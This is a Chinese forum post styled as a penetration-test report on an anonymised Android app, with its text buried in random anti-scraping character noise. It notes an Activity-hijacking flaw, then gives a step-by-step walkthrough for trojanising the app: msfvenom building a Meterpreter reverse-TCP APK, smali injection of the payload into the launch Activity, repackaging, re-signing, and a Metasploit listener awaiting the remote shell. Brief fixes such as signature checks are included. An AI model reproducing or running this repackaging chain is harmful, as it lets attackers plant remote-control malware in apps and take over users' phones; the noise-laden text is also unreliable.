& L( c/ P% N4 W! l7 X8 [1 H/ J) D9 D0 y: z, N$ n* e

3 M# i7 N, c' k, e0 w/ }( Z 5 U1 X# {% ~/ J; E* V6 Q7 c   ( {# E" L. a$ x, \# v& u N$ ^* x; a 2 j3 _4 M. B: w \( @6 E8 i+ D

4 D$ |1 q( D* w# d ( X% s" q& U1 ~3 W

$ k7 B" S' l* r) _6 j0 n9 ?* v" Z, m* L+ Q# {, r6 ~2 X2 ~9 C# | 1-2 测试结果 8 G p: l( M) o: \+ ^7 a ! r6 c/ k# r3 h: s0 U v4 I

' A+ r) y( H& s7 M) Z8 s" u! F. ] ! j2 @5 e6 ^( ^7 g

2 L- ~7 v$ H2 E I0 _3 |) G8 P   5 U Y" U' G. m1 l3 \, f$ C 9 t/ [/ e( j5 Z6 ?" z& B0 z

0 n( u! r# W" g) R5 i0 P ( T V; h5 ], ^% f* |

: I; N. ~6 A3 u- \2 C/ G+ ~ " [& t5 z1 Y" e 2 检测结果                    2 k% u# B' B- z 6 o O1 O/ ^2 \# z Z+ R

: y! m( V+ n; o: x/ J& O4 p4 P6 }1 z# ]: q

" L* O% d6 g/ |! @, W% v* `7 J% w$ D 2.1 某某某 ! E5 k* C$ z) z% f7 u. ]% A5 R 0 @0 A8 R4 l7 s

3 m6 S4 j, K1 @7 T k5 b# M ! a2 P! e; F" r/ c ?; j

" e, C' @/ q% \7 \* }- x% M- U$ H 2.1.1检测目标 & K5 \$ @* s# _& v$ J * O$ v2 R2 w: I+ j# w, r

8 F- Q& e, R9 F" H3 a % M" W5 _; n r$ h n

; a# P6 ?3 ]. t- T2 G! s6 {0 j; C, @" N6 C9 T* s0 ]( b- x. S 目标地址: 某某某某某某APP 5 l9 S9 O& m' K8 n, P) p% s+ K 2 V& _0 R* l4 ^* m# z% R8 D/ V- B, S

8 S5 x( o5 O `( f' J- i ( |6 R( S" ^" r, W% r# b% T5 v

: E, @: L( A2 P* j q. ^% N' m2 \/ }5 y0 u1 p1 P1 ` 2.1.2检测结果 : O. d6 z7 r' g' `; Z1 z4 }' K 8 A0 h- X" g' ]( _; S2 k" Q

* A0 E; N2 O5 f+ i) o4 u9 l 2 o1 z9 v( D- w0 ~* t

8 b. ^' w; G1 \5 v0 A8 k 1 V: O% J. ~" t2 }+ J% G 2.1.2.1 6 K" `2 @! p- S1 q - _' U4 [" `7 z7 ~- b x

* k$ l8 y, s9 q " S7 h3 d4 R- F6 X" H

1 n5 l" { X- H' h3 `. a3 y7 k, \ 漏洞链接地址:某某某某某某APP 3 F, x( O$ V) A4 Q6 v6 r ) n) J4 {' |* v! y/ \% j3 f' f

5 {) b( ~2 M( C! d$ Z7 h% R 5 W( e7 E5 n9 x! R1 ~( V0 C

+ D$ z- V1 }+ y( C! [' }8 y9 Y4 e' P2 j, j$ {   3 A2 k0 ~- L" L. N7 j7 s' }% Q( [8 T5 Y% c

1 i. v8 p5 B5 i- {8 O 1 |9 O4 E4 q" F, ^2 O; G

: g+ }& l: s, t! C6 n4 I& ~ 1 w! E: E' }4 O 漏洞分析及取证: 1 @* O8 B& X1 z* |: c1 y" P . U' Z$ `0 x3 |7 b

* b* D1 \1 k0 C$ j + p; j: [; [% y4 _1 R ~

/ h# I" ] L, T: M* G# v5 F/ e! D5 r( q( Q0 E$ @" K/ s                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: $ ]7 t" v4 M3 j: d; _# z( W1 y7 z. V2 v# o: r) f

/ V4 S5 l% J2 ?) p' Y: t! c# `2 A& P% s1 P" v' A

/ d! v; g% f5 \ 5 p% G5 A. Z) I' ^9 F      ' r+ z- V# J; b! k , N; u1 D& k3 u# ~- m, e& d

* o; h% r! H& a4 B4 I! _ # W) Z1 C4 J, M* A! C# z/ L

$ W; e7 i5 v. B& _" R% X . v( P+ b+ K9 s+ p! w                       ) s6 C' C% d) ~4 \) W- n- q1 s9 T* U& |# K8 U* N

, D- [6 r. m4 u; @5 V ) O1 k! w |0 \

- I% _6 X, Q: u/ w! M / B- ?5 e) J( J% [+ ^% ] 9 V) q6 s+ m, O: L) b/ ?( ~) v& U- G8 ~2 Z2 S6 W. I, J

. X" e2 @2 m! U2 H, |1 ` : {3 j6 c' }& K% ^

, N0 `* D& A1 @# Y+ B* o1 i$ ~ * j4 T4 f' u; ^/ ?0 M* [1 b9 A 1 T: S3 b: w% }7 I/ a' I% z

, e- G* ~' L, ]9 r 0 D4 H- c+ ]: w) L

* [: ]9 q s5 L/ V! f0 Z @0 z7 G8 I" a 7 L, N3 v# ^& ~- W - V! T0 e3 U4 r9 G2 V! f' w

% q' F( x3 {$ F7 m7 z/ o5 \ ! F. Y1 e9 M& e. j9 U. l

8 {) S! r8 t8 y! w! c' N4 K ! \7 o: @# ]% m5 w- ` 漏洞危害:高 / J/ {+ |4 d/ [5 `1 c- J8 z1 g, t ; _& }" I) H& j

3 a* T& P2 _2 J - E/ t( f$ U9 `- b% l: ^ N( U
$ Y p6 S# P% ]6 r2 N& L w# l. g3 a4 m& U6 H ! P/ \5 C4 t( }1 x' c+ Q" W9 Z, Y2 P' P0 L. K3 F8 k; e. v- v9 g+ r- ^) [* ~8 |5 q7 f: V* ^+ v: `: U, Z/ C' K! F0 ?5 I- S7 U/ |; E; r& f) q( L3 x, A; m }1 j! E% j$ k% _& X: N$ c e, R& z0 {) y* E. r1 W, ], r5 E4 P9 h8 c# w* U; V+ V3 Q; _6 u* A- r' p* c" m& ~$ v: X! }: J0 c* o) U) ?4 s1 f$ I( v+ q# d7 Z }' {& E& U- [- \% h+ s; b3 s7 A3 m2 }: @5 D- q8 r# e' q( J8 e- K' \$ l U, Y5 x' E, a# f: m5 e) @) ?- J$ [8 E6 N5 X6 h, b* v4 A0 _. U# l3 f9 o3 l P" F8 G( j+ V$ i/ R4 f8 F5 ^0 A2 T: g5 Z0 p7 }9 K- A, A4 o$ D# K: _+ L5 x- w' t# \
/ S# |1 |$ Q) k( [3 ] K4 J+ Z2 Q - t: H* j* i' ?7 `" `/ a+ Y+ ~

' D* ^* a9 H- A2 J # t) j& n# C6 _3 B6 @ 严重程度 c( g' ]" t& n p; v6 Y# y 9 k2 M z7 x% O# s, s

! \; I- e" o1 n* I1 c6 f : }1 s4 _! {& E( [ 		W& J" j7 S! j6 j Z1 V3 P# j' {2 J- U1 l

! U6 b! Z8 u9 Q! y: @3 m' J* D " B1 O6 c4 H& b # V' [& [4 m. J M/ v. I: Y . ]4 Z/ w) |2 J( S, u4 y5 p% C' |

- g) J) l" n- W5 @ # q& v" v' J8 E 		& o, _ ~, l' J% u 1 `& e0 z$ L: b

. ^! c+ D4 ` T . B1 w* Y3 p: H ; E" a& H+ A: K* m- H 5 A; i! m1 F. R& e

4 N5 ^3 g. o" c( \, }$ f0 g, A( q; z+ Z7 b4 d 		S# L3 ?/ ^0 f- w4 K( d ) \% D4 V. A* _* L. c. U

6 c" R- a; z- y" \/ J# f ! M/ Y5 [- Z- j; O6 Y$ F( ~6 r4 p 3 D. z' [) x+ G8 z% w6 Z0 k" s5 \ ' a! Q* k+ _6 ]. d

4 {. A- u. f8 i p) ^4 j - F. G& O6 v4 G' [3 z. L 		! }! R4 j. P0 Z2 J1 F R % Y9 }4 L+ l- C& ]

, j! X9 f% L4 ]8 X 4 C3 s9 L9 a( V5 m8 a' r   / h9 A/ B7 z* W5 R. L3 E. E, ^ , G7 V* s2 r; D% m0 I! }4 C

( ~. o! O3 F- {2 l8 ?: W- O + m8 M0 ^/ C A) V# v9 ` 		9 R6 s: [% N! b4 Z2 K. c% A( Q) y$ c& ~9 T: S! S' C+ J2 j

9 M7 H+ V. m7 o' D K5 L( k' F" B & J+ w5 }0 U' H# c c8 N! a( ^ ! s: Z+ |% b* Z5 {& v

% j% N# E( L% U6 j + j( Y* U: `9 ^4 \ 		9 U; i( Q; C9 t0 G3 o. V, T" O( s) \$ A9 A8 W0 G6 U

Q; W- n! Q* k 5 g/ g- U1 N2 K1 H% ~. t& M   9 f1 w9 \- |, n 8 @0 n! }6 L* E# P4 r: F; D

3 M7 E( I8 d! _7 H$ y. a8 O, N1 Y& c3 h
, p- P6 {. w" Z, ?/ C o g, P" S+ ?& P. n
% L, P0 e! o, M1 `0 j2 ] 0 F- f1 S2 P% x

3 R6 n7 U9 X/ \2 C " t* M! _& Z& |0 m% `# `   0 U8 n6 Q6 F" I# A# m " s) s" t" w* E" n- x! p

( s! O' _- n$ ]; [* z; x* `# M% W

' _: I* q. D: O; b9 r3 d. Z5 S1 \+ C# ~9 m8 ?7 _- x" m 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 8 C' s( r* J9 Z% q, n) s4 [ . n Z ^8 P; y+ D, `) K+ T

( v9 {. x6 W# q- j6 S8 d6 U4 C & T, _2 C$ _' X, y* w' `

& y1 R7 H* l6 }0 n' \% c ' E1 S9 }- W3 L: r5 B7 N5 _           6 M8 p a# j% P- t/ a# T i" {5 ~- ~ G, E' S

& v' e( O1 q. N+ R2 ^ 9 r8 G% K5 l- L: v5 g

3 {7 x) s# R X3 p+ v+ o , b+ ]7 ^% Y) U& i( f& {) [ ^   . v$ [0 J: C; g4 R1 R6 b$ q 7 P }5 u5 o* k! O

7 j( m$ w' Q+ S; j1 H- g % i6 @- A' _5 y

5 p5 Z' n! Q2 M- E2 h* `( n. ?' L+ E) @ 2.1.2.2 + g+ P0 }" d) w+ ?/ r! | ' u, r! M2 v4 O

: s6 B9 e0 p& ~7 a/ o9 k# V3 k" o: ^8 n. v X( j9 V( E+ x

3 i4 ]/ T" q* z6 ^ ; `8 C+ t! i, L+ s# w 漏洞链接地址:某某某某某某APP ; X, Z( b4 V: v* u$ s+ N( X6 r 7 \! D: @! y- A! V' e( J6 D$ N

" C" S" b) z; T2 V- Y! f9 h 8 T0 w/ y0 U* k q4 T

6 N2 ?, W1 d& z6 u6 V0 \. ~4 z9 J& l; ~ 漏洞分析及取证: . V+ w6 H ]/ ^3 a( p / G- ?2 u) u1 x- r! _6 Z2 g

6 f8 r' R( {. L' i3 L. \5 C , v( X6 G1 E/ `

* C! H( a0 ]8 U6 G1 r 9 W- g" i! w% g& ~# `                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 1 e. ?5 B" {) n* R & q+ k! \1 i) {6 Z) i

D2 g0 H- v2 P9 z: w8 \! O' _3 d, |$ |

, L9 [1 W* |% S3 L* b) _# ?. U. x ~1 W7 I Metasploit 生成木马 apk 5 I9 U$ }+ q! v" q! [ $ Z* \: e! W; G- ^

* x6 P" [5 c5 K& f+ t) e. e+ G/ `# c- E9 M

, y$ P- A1 y' Y9 b+ m( u & J. z1 y8 m5 \$ g/ N7 N msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 6 z. I+ B5 D4 z, d, E; R $ k2 w8 n7 |. B, h

! C, |9 s7 j% l# I4 R7 j" t; ?% {9 I! F1 {

, f+ S* I- {; n0 e8 P $ j: o4 v+ W/ J# F 反编译目标apk和木马apk . T* @$ q. U$ k0 U/ ]) P, ?; O4 z/ @ / m/ w* x9 y+ V: c

; B5 U1 z: G2 x* ? 6 x* O" i0 h7 D- o$ K1 p4 M+ k

) Z+ w( R. v9 U. M4 H1 w ! Z0 U) f6 |; I) d3 ?$ P apktool d target.apk
: W0 z2 i& B0 W + d: @3 @# |$ o8 t apktool d cockhorse.apk $ M5 X1 R% W- v4 Z$ H3 l 2 A* [: }' y, p- O1 B

: A+ w2 o% g6 j( g% n 7 b) W" p/ Y# U* V9 ~

' w) Z- t! W$ k. E: }; s$ [5 o 2 `3 {9 b) Q% W2 X 木马 apk 注入目标 apk $ _; A6 ^# o. U- q+ L! J/ K $ ^ \- [5 t& w( K3 o3 A

( [* X+ @# {( O2 A. b) P0 r- s. ^9 l: m

0 c% z/ ?6 S' M( Z @2 ? ; i$ `% u0 a0 Y1 }/ g1 w 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
) e8 k, w* a/ y 9 M. T, I" K5 r% n. s, W invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ) R. }' b9 p) W& C T( P$ q& Y# C 2 q9 w7 _2 _5 f1 E0 W, v" j6 s9 n

" y; A9 I, E( F. `: G ?- x! g5 h) b: |) E: `: W. I

( |6 {) C: y5 M( k9 _: g 4 C8 {7 q1 ~; A) D, y 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 2 r( z+ v# a% g4 O, A% i { # t, g9 n% A" H8 l

O; z# D$ w9 o ) u& p7 n5 R% c

& Q/ p6 Z _: Q6 F: _% R8 v) ^ * g2 w& l# T! G 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ' k9 u6 R9 b% }2 H8 u: I8 a 8 ^) }1 Z% _8 j( s

* N6 I, x7 T. n/ K 2 H2 m5 ~) z' d d( L5 S; G

# j% \0 |. H4 A- K) p: m 1 ~% X/ K2 ~# X+ E a$ y 回编译生成最终 apk ) G8 _& l: w# @ , S% ] O; t0 Q. ]6 P0 W. Q: ^5 o

; Y& \- K" ? ^& h! t* v3 e! r 6 f& Q: q6 |" I* c# N9 |

- B/ I4 g: a. F0 H/ [3 B9 k' s" J" `' V0 ~5 v; K 重新打包 ; w, u- c5 Q i ' g1 v' v7 B2 t

1 t) k+ @) I7 r0 I- E+ P& L- X: J1 s8 Q) J

. _+ _9 E! d" i4 q # s" i1 J4 T7 v; m# q8 }0 W! D apktool b -o repackage.apk target_app_floder / N+ P' L2 m$ W 5 ]1 j+ ^) C a- c

, m& J/ F! {# m# e7 Q" y5 B+ D; ?% ^1 n: d

2 L( U/ m" N X- F% _; x. B) z 3 j+ U: s' v6 s D* Q- Z: y 创建签名文件,有的话可忽略此步骤 & \) n4 ~7 ~% j D a' H 8 i6 L" \9 \% S: M$ A! K

* M/ W v( t* A, @5 L4 B4 ^) I o3 V$ g, R# e

6 k2 P6 F" [3 Y7 G% s7 Z+ r - u* U" j: `' X$ ~0 N keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ; h7 o A3 |+ {+ H k- ~ ( z& F" p2 [4 Y

" Y( m, X( m: d# z2 } M+ [& S' b/ J8 W0 U6 F. H, _

: M% Q. J6 ^) m6 B; y6 M3 O; T# d4 j$ ^) s+ w! i! J. b2 E 签名,以下任选其一 $ |' R& v3 n0 D) J _; b ! ]' l* V* }# q, ^- r

3 _( C' K6 S( Z$ _1 }7 R9 }# c' x, H6 {

* t2 a* Z* ~! X1 C1 e/ l3 b' Z+ b5 _$ v" F jarsigner 方式 ; k6 ^+ J- V6 R" L! z$ b 8 K+ g4 z6 {; H0 T) Z0 o

* z4 ?% D* c l* J% g9 i / V4 C1 `) V' q0 |- p% }! {1 P

& a% ^2 ?" E" ]- {+ W$ ?' B - G* j2 v3 A6 B7 K1 p) w7 [& C jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname # ?6 T5 I4 b% V1 R 4 O3 \, L; @1 e$ ~* ~

% n" _' T! [$ Q; Z2 {% B' m: \& y4 h( g

( g3 t& d/ J$ ^& N7 u$ p ^ " k% M; L7 T' b4 n apksigner 方式 5 X0 k2 h l8 ^" f$ D: u$ O ( u0 B2 K2 k; }) o/ _& b1 x; Y

]9 i" ]' O! P ( v+ b2 @& f- \7 g) ~! I* Q- W

9 R/ p/ M( ~8 D6 C, C6 o( j " q0 ~4 c9 @4 D% p apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 2 |) X ^7 B0 m3 a/ p6 b 3 X# l6 \6 [& W2 f+ C

0 r' M2 f; J3 F9 q " r" f3 c& j. g1 p D* R

( y( g8 T k/ x 9 j7 I% N+ {- q. @' ^ 如需要禁用 v2签名 添加选项--v2-signing-enabled false 4 d& A# K+ Q& l k 2 ?" N5 m4 G2 g: S6 W

' V; R) Q. D2 N3 X / K/ }" C2 r; K$ {& Z- Z

: ^8 g S0 H8 i8 F + L) `% R$ p2 g& W0 E 验证,以下任选其一 ( C: Y5 F2 A6 z / c' h4 N8 J7 F9 `, T) [

1 V1 K& U, m4 D' W! K$ B 9 b; t1 ?: C7 T+ z% h% C

3 k- J- d: f6 j! l, ^* G 7 y; I3 G% {. h b6 X4 P2 n e6 [% o jarsigner方式 ) t/ [7 L: o( W 5 T% u: C3 g% p+ y% H' t3 I; f: E

# Y% `- D. T6 k$ k6 H& F * ^/ b/ b2 R9 I

1 }2 `6 ]3 p7 e4 V' T 5 d( c+ H) U- L, o/ M& Z) P6 |) m jarsigner -verify repackaged.apk * p5 u7 _4 _2 H/ c ) t( [7 y4 h9 `/ W0 _

, ]$ I3 ~! j7 f- \$ x8 l | ; m, a J8 W0 h g4 K7 J

) G( l$ }$ X+ b" A% M7 [2 P1 G( q2 Z/ ?0 Y8 Z apksigner 方式 ) m ` A& X3 X4 v ; I( R5 U3 R$ e/ [: Y- K* V

; R2 `' X2 l. [) R P 2 E: j) @" A: _) r2 q0 w- h; i% g4 b

7 {* O) a5 h! ~; O2 b5 s4 n: V. x2 R " d) u# c+ S& U4 K% x1 u% J apksigner verify -v --print-certs repackaged.apk : L# b. i! T J: I . Y0 ]* h# C/ }' r j7 ~( o

5 ^6 \5 l, @# C3 C! A# S+ D. l2 n/ l# C. t8 |& h

) h2 B7 p% }# w7 Y9 z* b0 g% [. }; m! o: ? keytool方式 ' [, h& Y; i- s. ~! P. c, Q 6 I- q1 H7 w, k. k0 K. C: U& n/ R

" f. m9 L. {# j5 @% B' i+ l5 l* ~* `8 X8 R) L3 p! @

# D# o. N9 j$ E3 ?+ H, ^7 W3 W) u 0 m: @3 L* |) P keytool -printcert -jarfile repackaged.apk . x& ]9 t" ?( m/ l! ^* n- N) V% s. r, T: ~: T0 d

5 x/ V+ Y9 Y2 `: @ ) Z9 ^- z5 R* R' `5 b& H+ j

8 k0 m1 F+ T7 R2 O0 @1 c/ A: Z9 K4 o8 N& K 对齐 3 Q! S- t7 ]4 \. @; h1 G ; ]6 L" D4 l" Y2 a

. t' \" F+ M) P+ g" X' ^ ; k: \. w6 G4 G" J1 X

+ a9 U3 {: s; w+ w, W # y6 G0 `& R: @3 V0 H 字节对齐优化 j' z! G$ B/ v/ }* W5 }9 A5 x# E' B, l9 ], l

" \. \# T4 T* t; L+ j6 g% ^( g3 B5 M+ ?6 }+ T! q; X

5 @/ v& f. F% \" J g* l1 Q) w ; `7 a+ D3 U3 z0 |1 K4 | zipalign -v 4 repackaged.apk final.apk ' C- ^# u& @0 D, q# s - {2 g* n0 A0 H" P2 z: ^

5 U8 |3 L( Y3 M& R5 S6 I( y8 w0 ]0 W# \: H/ k# w" R

2 A; p, `$ b) J- W, V+ A% ?. x 8 z* O) n2 t% m" t/ ~( r 检查是否对齐 , }( S3 I5 y( a8 B7 t1 U& g# E, z ( c* B o3 _: `' A: ]

* q5 T4 i% a- V9 F. Y# g4 Z ( }; b) b$ y4 ^* a: ]

1 Y6 O& L7 l& q( o* ^2 L" R) P/ R! ^. O2 H zipalign -c -v 4 final.apk + B N8 y b3 P7 e# K' R; i 3 s4 r# V m5 Z

) s; m& |; `# m( [, l5 o9 x, D7 O) m, e6 @7 x, `

. j4 u6 b! `5 h1 H/ J $ C- ]% v8 k) w8 f: ^6 p* W 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 4 u' a8 f# U; g! W8 B* w5 ?, K3 M * S/ D9 i4 I3 y% m

0 e7 x! Z w& k" ~4 l 0 d( v3 r3 Z0 a2 i1 A+ A3 B

6 K) e' Z2 m1 w- z' u( {! T9 N2 S/ x% ~. ~$ x* Z+ i9 [: q) D 启动Metasploit控制台,配置参数等待上线 7 @* @( b0 w3 ~6 O - g- E1 W) a4 g! B) j; W! x

2 W3 [4 A5 W( L- g 0 h/ R$ K+ }5 h1 [8 {! S( c/ f

3 V4 }5 X* n( e5 F8 u0 u' ^4 K% P+ {6 W+ D 在终端依次输入如下命令 & K: P$ i7 j7 |1 u8 L9 S: n& \- O+ F 3 W8 k$ A7 ^9 J! v

4 M0 p. t6 k, p: w' A4 J ! I: r; Q/ X" M1 v. h i

, K) w* I1 E# G/ o + p+ `2 ^5 D# m msfconsole 3 d! ?5 V" ]. G8 `( o+ j) n ! t2 |. p7 X7 O( K" W9 j6 ]

" i& L# s: K: k5 ]4 H . T3 Y$ N) d B% [

; F( W" i+ ]" e 1 H4 j/ x, K |- |& ] use exploit/multi/handler * _3 J: }2 o' J4 y3 G" b4 c6 j6 S8 a( O% Y% T2 l

$ b2 g( F! D- X- G, u0 H0 d* {3 H / H5 c& ~ U( `3 I

- ^: e1 m$ B. ^& Q" r 0 h* p- U) k# x1 |( g% W B set PAYLOAD android/meterpreter/reverse_tcp 8 w) a& v% f# P. i0 h: ~ f! ] 0 ]) F: r5 k/ _ O9 T6 N7 ~( ]/ S

7 w! p3 n" ?# C: N' N4 w# O+ _0 K/ G# ?4 {: l5 v

/ M* ]+ |' c z$ m) t, h + g6 v3 V I+ d* q4 Z4 V set LHOST 192.xxx.xx.xx ) R1 |* I7 v6 q- k' y: u, _$ U4 b3 \6 N/ |7 A' g- i) C3 d

1 L' a6 ?/ {; ]. ] 9 r( e* @* n& e0 o% X

) g4 p/ ^& ?3 m5 g6 ~: K: c( ~& W 3 H, ]& x9 A" t+ l; ?/ M set LPORT 4444 * X* H e- G1 Z1 n7 v0 a, t: O& @& r) q) A- `9 _, H

8 {! K1 j! ?" d$ g* \* G , A& G1 ]: }/ |4 m) C

4 x1 Z4 U9 N8 o1 w7 c3 F4 ~ # X5 c* z; I" q! z) N, T0 L exploit 0 D4 X3 r3 P- @9 |# _ 5 p e/ m5 ?% R9 ~& J7 f9 N% V

% ]( [. N- q0 g% q* y; s) w ( n w1 C2 n ~& H. G- L, x1 v

6 H; }6 |9 `5 L9 o V, f & n6 G1 s, r' [# d4 F3 N8 R8 r- s. N 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               0 t1 t% a- X) ^- Q3 H ; N: T4 ^9 j4 C& m- r

* ^2 o, u- p, r; R: z 7 a8 @( c6 s/ H5 }- Z: t

1 }: Z ~+ p: J2 B' H7 Z- ]. `3 f/ o) Z + E8 j$ M* R4 j% K9 q( K 漏洞危害:中 . n" N. Z1 c. h1 T L j3 W / L" M: }* N5 w: Z. h- ~( M

1 ?9 f) ]# b/ @, m9 h' C( g 8 u: r' J3 [) C' F) S3 F
+ s& j2 P" y2 G! n$ m+ ]' ~% u$ y t8 J' J, T0 I0 c . |2 p, o) K& z$ F* n2 i$ L4 p. Z- D; K+ p z% s2 G # s4 E8 {* n* K/ u1 [% e( C7 j9 |7 q8 {, C9 t0 C7 O4 d3 W4 w$ l" A0 F# k ? O) \. \8 L& @1 _% `7 d$ c2 [- y8 h& L! F6 O3 s! Y$ [& q$ B' o2 C, |$ E8 x! Y2 p5 B" P7 U% ?! ^& W V) e' d0 m& b7 y4 w( k3 t4 X* a+ e& }* J, h: E h6 C+ E4 P2 X) B" G5 w4 Q; s+ F* J) i. `+ _4 O- I [8 ]( Y$ I7 R9 E& }2 b x6 l0 j2 F' k- q8 p! |3 b9 P& a4 \. T8 `- w1 ]# ~( p; X, t0 c6 f( M# I( d8 m& q- ^" h, [+ Y+ Y0 e1 g) g, ^6 P9 r" s) y1 H8 I+ T. B- E: w. Q$ h% ], c4 |" M( {, G2 k( L5 h1 X( I% _' h% D. I# k. D$ Z; ], Q$ b% r7 l4 C4 ~, k* q, m: D3 q! m" y ?$ K1 _ } ?3 r% G+ r$ H$ ?4 f Q9 t
8 O! |3 p9 `8 c3 B% V& I6 Z " {; G0 ~7 @: t4 @$ z8 W- B5 |

) O' u5 ]1 a6 n, i & B' m& W, h' M7 _2 B6 V 严重程度 ( `0 J4 P' x2 @ , L5 g0 D: _5 t- h9 {, Y# J, ~

5 P3 m0 n" O: M3 ]( V/ e6 H) c+ X0 Y9 z5 { 		+ v; L, m/ ?( E8 E 6 ?, g* _ a2 x; ?# P/ @( ~( D

: k& {9 W1 j* B; M! |6 Z, V' I$ T) o1 s) f# N5 ~( c 5 t- a3 V1 c/ X$ P! t# s ; g1 ?1 B4 D) Q* I$ G! T0 p- w

! i. W" W, ^5 q/ {0 [3 c' v. X - z" s) H! B" J5 _; m$ _# K 		; K5 o: M& u' F4 O- Q2 ? * B" @+ a1 X, K3 Y

. \+ r' A/ U' D& U7 U( v# ^ * A4 w$ F) t) b+ X3 A+ H0 p G6 y - D% ?' C, J, U6 w! { . F. r0 X) f0 c: I

! \0 S, G$ b" x7 B% u9 G2 { 3 b, q" Z" M, b7 @ 		[2 h. i( @7 } I4 V" E5 Y4 p& P' D+ _4 u1 d9 Y4 r

; @: I6 j# Y, u2 A6 c* \0 g& m% U% v6 K# N( _: z! T% ^5 d , w5 } S$ [, g) K; J9 m 6 Z/ _+ H/ r# N6 E7 N. l, G% R n

0 g; d9 R/ O6 Q" W # N- i# g5 s9 D7 V; [ 		k/ u" P& P7 O- G8 x2 ?/ { u 0 ] m# [' F3 v3 x% M t& _: M0 m; E9 X% `3 h* ^; n1 W* h

$ A- S1 k/ w- h( t ( V7 {* R3 `9 {! _( ~   9 A% O2 ?# \( b4 p4 O& G! q) T7 `3 v+ w

6 }- @1 {$ T8 h& S7 G1 x0 U 7 a2 k4 s# |6 t8 u( i 		4 O; c L ^& K$ k Z# [: Q; f, d6 B

0 y+ g! E) {! r" u3 z/ Q @ 4 o5 b n" G) s , x% Y2 A9 s5 T9 o+ }, w 2 \, _! S- o2 r4 y: X$ |

* v6 z6 D( ~7 r' A3 b' c% } / l! J$ ^; T6 W/ A 		4 R0 `6 J( q1 A* ^ & z6 G1 ^; @; p$ B # E/ f- g: |% `6 J& J 5 ?$ T/ ?5 W+ Q; y

! U+ i1 k# W- n5 {- x0 B; B/ p, Z% V/ G   - f: R$ F, S8 b) _; ^ B# F" p) k ) @' i2 U9 B6 s, \

3 C: l0 B) i+ Z9 g # K- Y" d% r6 h W! `
- p% \ \* p; j6 c 5 W7 V$ h7 Z- A3 B: T
, l' ~9 t; z6 H. a% L$ r7 \9 { % d \8 j$ p7 K0 I( L# ] N

' O9 I6 U- N: `5 I4 L4 G& X" M5 c y% q4 z6 n   , A* \ F6 V: o I% t & i j: i2 Z+ b3 ~

& s- Y6 c# A: q, I5 B8 X/ B+ ` 0 E7 ~% u* ^; P! P* O; f

# k" _' }% \' Z! V& ?2 B+ v% g# M6 |: X* h, i- k5 G" v( y" N( \ 修复方法: . y0 H# u4 G4 Z0 k/ g2 T9 I 8 T. j3 B. {% C- H9 n8 d( l* d* Y

' o2 b3 t) {- Y4 O. |9 Y* \2 _) H 8 l! S& j8 O) w/ ~

, Y4 I) K4 D) ]6 n 4 e/ \2 V, D$ z; Z$ U9 t$ r               1. APP 启动时应做签名校验防止二次打包。
3 L' {$ H5 w4 t0 _' O, \$ \" U/ d1 ]8 `) m 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 0 _, X3 ]) G/ b" j . s& ?& U% m: D h( I; k

8 d% [( l) C# p9 s/ z) w( f$ {1 j& G4 D% p* H , I+ B: [; ~- } E6 | ! k7 y! K; ]# j

0 ?+ ?5 f- X4 T# J8 Y, ` ' R) z! n& @7 U( m) @   2 u) z* X% N0 _- P( R & k. |5 d- k8 P" X

~/ H$ s3 Y0 A: [ 3 @+ S, s- w( v+ b3 i. d " Y8 f0 Q" S' h3 n % l9 ?$ J7 t7 x

0 _6 ]% W! W t$ t / O6 j3 j" d4 H' ?, y% F' |0 v* x
; i. j) c9 {+ D1 C4 T! t& m ; v- n& @2 Y5 v! i; B3 K: G

" r& n9 _; m. @& ?2 l % Z) x1 z% L* v% \
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表